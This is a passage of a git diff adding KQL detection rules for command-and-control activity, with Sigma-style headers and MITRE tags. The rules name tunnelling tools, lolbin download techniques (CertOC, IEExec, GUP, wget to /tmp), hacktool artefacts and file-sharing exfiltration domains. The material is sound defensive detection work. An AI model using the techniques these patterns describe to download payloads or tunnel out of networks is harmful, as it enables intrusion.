"9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078")) and ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or (ProcessCommandLine contains ".exe -url" or ProcessCommandLine contains ".exe --url"))) or (ProcessCommandLine contains "-url" and ProcessCommandLine contains "-no-autoupdate") \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql new file mode 100644 index 00000000..a3a203ff --- /dev/null +++ b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql @@ -0,0 +1,12 @@ +// Title: Cloudflared Tunnel Connections Cleanup +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-17 +// Level: medium +// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572 +// False Positives: +// - Legitimate usage of Cloudflared. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ") \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql new file mode 100644 index 00000000..391c60ba --- /dev/null +++ b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql @@ -0,0 +1,12 @@ +// Title: Cloudflared Tunnel Execution +// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-17 +// Level: medium +// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572 +// False Positives: +// - Legitimate usage of Cloudflared tunnel. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run ") \ No newline at end of file diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql new file mode 100644 index 00000000..b19e54ae --- /dev/null +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql @@ -0,0 +1,15 @@ +// Title: Communication To LocaltoNet Tunneling Service Initiated +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql new file mode 100644 index 00000000..b77e3af2 --- /dev/null +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql @@ -0,0 +1,15 @@ +// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file diff --git a/KQL/rules/Command and Control/curl_usage_on_linux.kql b/KQL/rules/Command and Control/curl_usage_on_linux.kql new file mode 100644 index 00000000..ea57bd5a --- /dev/null +++ b/KQL/rules/Command and Control/curl_usage_on_linux.kql @@ -0,0 +1,13 @@ +// Title: Curl Usage on Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: low +// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where FolderPath endswith "/curl" \ No newline at end of file diff --git a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql new file mode 100644 index 00000000..f6aa8597 --- /dev/null +++ b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql @@ -0,0 +1,10 @@ +// Title: Download File To Potentially Suspicious Directory Via Wget +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects the use of wget to download content to a suspicious directory +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where FolderPath endswith "/wget" and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql new file mode 100644 index 00000000..90a1fc9b --- /dev/null +++ b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download And Execution Via IEExec.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-16 +// Level: high +// Description: Detects execution of the IEExec utility to download and execute files +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IEExec.exe" or ProcessVersionInfoOriginalFileName =~ "IEExec.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql new file mode 100644 index 00000000..181b3812 --- /dev/null +++ b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql @@ -0,0 +1,10 @@ +// Title: File Download From Browser Process Via Inline URL +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql new file mode 100644 index 00000000..cdcad4ed --- /dev/null +++ b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download From IP Based URL Via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: high +// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql new file mode 100644 index 00000000..63dcdf7c --- /dev/null +++ b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql @@ -0,0 +1,12 @@ +// Title: File Download Using Notepad++ GUP Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: high +// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Other parent processes other than notepad++ using GUP that are not currently identified + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -unzipTo " and ProcessCommandLine contains "http") and (FolderPath endswith "\\GUP.exe" or ProcessVersionInfoOriginalFileName =~ "gup.exe")) and (not(InitiatingProcessFolderPath endswith "\\notepad++.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql new file mode 100644 index 00000000..21f6ab16 --- /dev/null +++ b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-16 +// Level: medium +// Description: Detects when a user downloads a file by using CertOC.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-GetCACAPS" and ProcessCommandLine contains "http") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/Command and Control/finger_exe_execution.kql new file mode 100644 index 00000000..965cbed0 --- /dev/null +++ b/KQL/rules/Command and Control/finger_exe_execution.kql @@ -0,0 +1,15 @@ +// Title: Finger.EXE Execution +// Author: Florian Roth (Nextron Systems), omkar72, oscd.community +// Date: 2021-02-24 +// Level: high +// Description: Detects execution of the "finger.exe" utility. +Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. +Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Admin activity (unclear what they do nowadays with finger.exe) + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "finger.exe" or FolderPath endswith "\\finger.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql new file mode 100644 index 00000000..d0e6c8ac --- /dev/null +++ b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql @@ -0,0 +1,15 @@ +// Title: GoToAssist Temporary Installation Artefact +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql new file mode 100644 index 00000000..02330050 --- /dev/null +++ b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql @@ -0,0 +1,12 @@ +// Title: Gzip Archive Decode Via PowerShell +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: medium +// Description: Detects attempts of decoding encoded Gzip archives via PowerShell. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1132.001 +// False Positives: +// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions + +DeviceProcessEvents +| where ProcessCommandLine contains "GZipStream" and ProcessCommandLine contains "::Decompress" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql new file mode 100644 index 00000000..c65ddad2 --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Htran/NATBypass Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-12-27 +// Level: high +// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090, attack.s0040 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".exe -tran " or ProcessCommandLine contains ".exe -slave ") or (FolderPath endswith "\\htran.exe" or FolderPath endswith "\\lcx.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql new file mode 100644 index 00000000..54836e41 --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Inveigh Execution Artefacts +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-24 +// Level: critical +// Description: Detects the presence and execution of Inveigh via dropped artefacts +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\Inveigh-Log.txt" or FolderPath endswith "\\Inveigh-Cleartext.txt" or FolderPath endswith "\\Inveigh-NTLMv1Users.txt" or FolderPath endswith "\\Inveigh-NTLMv2Users.txt" or FolderPath endswith "\\Inveigh-NTLMv1.txt" or FolderPath endswith "\\Inveigh-NTLMv2.txt" or FolderPath endswith "\\Inveigh-FormInput.txt" or FolderPath endswith "\\Inveigh.dll" or FolderPath endswith "\\Inveigh.exe" or FolderPath endswith "\\Inveigh.ps1" or FolderPath endswith "\\Inveigh-Relay.ps1" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql new file mode 100644 index 00000000..5e160de7 --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql @@ -0,0 +1,12 @@ +// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-27 +// Level: high +// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ":\\windows\\temp\\sam.tmp" or FolderPath endswith ":\\windows\\temp\\sec.tmp" or FolderPath endswith ":\\windows\\temp\\sys.tmp" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql new file mode 100644 index 00000000..3a3ced1f --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SharpChisel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: high +// Description: Detects usage of the Sharp Chisel via the commandline arguments +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\SharpChisel.exe" or ProcessVersionInfoProductName =~ "SharpChisel" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql new file mode 100644 index 00000000..03be964c --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SILENTTRINITY Stager DLL Load +// Author: Aleksey Potapov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Detects SILENTTRINITY stager dll loading activity +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where InitiatingProcessVersionInfoFileDescription contains "st2stager" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql new file mode 100644 index 00000000..ab5c4a75 --- /dev/null +++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SILENTTRINITY Stager Execution +// Author: Aleksey Potapov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Detects SILENTTRINITY stager use via PE metadata +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription contains "st2stager" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql new file mode 100644 index 00000000..1f59abde --- /dev/null +++ b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql @@ -0,0 +1,12 @@ +// Title: Hijack Legit RDP Session to Move Laterally +// Author: Samir Bousseaden +// Date: 2019-02-21 +// Level: high +// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\mstsc.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql new file mode 100644 index 00000000..c4890547 --- /dev/null +++ b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql @@ -0,0 +1,13 @@ +// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE +// Author: @gott_cyber +// Date: 2022-09-02 +// Level: medium +// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105 +// False Positives: +// - Since the content of the files are unknown, false positives are expected + +DeviceProcessEvents +| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql new file mode 100644 index 00000000..b5161330 --- /dev/null +++ b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql @@ -0,0 +1,10 @@ +// Title: Installation of TeamViewer Desktop +// Author: frack113 +// Date: 2022-01-28 +// Level: medium +// Description: TeamViewer_Desktop.exe is create during install +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceFileEvents +| where FolderPath endswith "\\TeamViewer_Desktop.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql new file mode 100644 index 00000000..ed761e87 --- /dev/null +++ b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql @@ -0,0 +1,13 @@ +// Title: Local Network Connection Initiated By Script Interpreter +// Author: frack113 +// Date: 2022-08-28 +// Level: medium +// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate scripts + +DeviceNetworkEvents +| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql new file mode 100644 index 00000000..7ba54289 --- /dev/null +++ b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql @@ -0,0 +1,12 @@ +// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download +// Author: frack113 +// Date: 2022-05-28 +// Level: high +// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any +anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC" \ No newline at end of file diff --git a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql new file mode 100644 index 00000000..138d524c --- /dev/null +++ b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql @@ -0,0 +1,12 @@ +// Title: Mstsc.EXE Execution With Local RDP File +// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock +// Date: 2023-04-18 +// Level: low +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Likely with legitimate usage of ".rdp" files + +DeviceProcessEvents +| where ((ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql new file mode 100644 index 00000000..0ff75d09 --- /dev/null +++ b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql @@ -0,0 +1,12 @@ +// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-08-30 +// Level: high +// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule. + +DeviceNetworkEvents +| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql new file mode 100644 index 00000000..d3b1434f --- /dev/null +++ b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql @@ -0,0 +1,12 @@ +// Title: Network Communication Initiated To Portmap.IO Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors +// MITRE Tactic: Command and Control +// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration +// False Positives: +// - Legitimate use of portmap.io domains + +DeviceNetworkEvents +| where RemoteUrl endswith ".portmap.io" \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql new file mode 100644 index 00000000..a482031b --- /dev/null +++ b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql @@ -0,0 +1,11 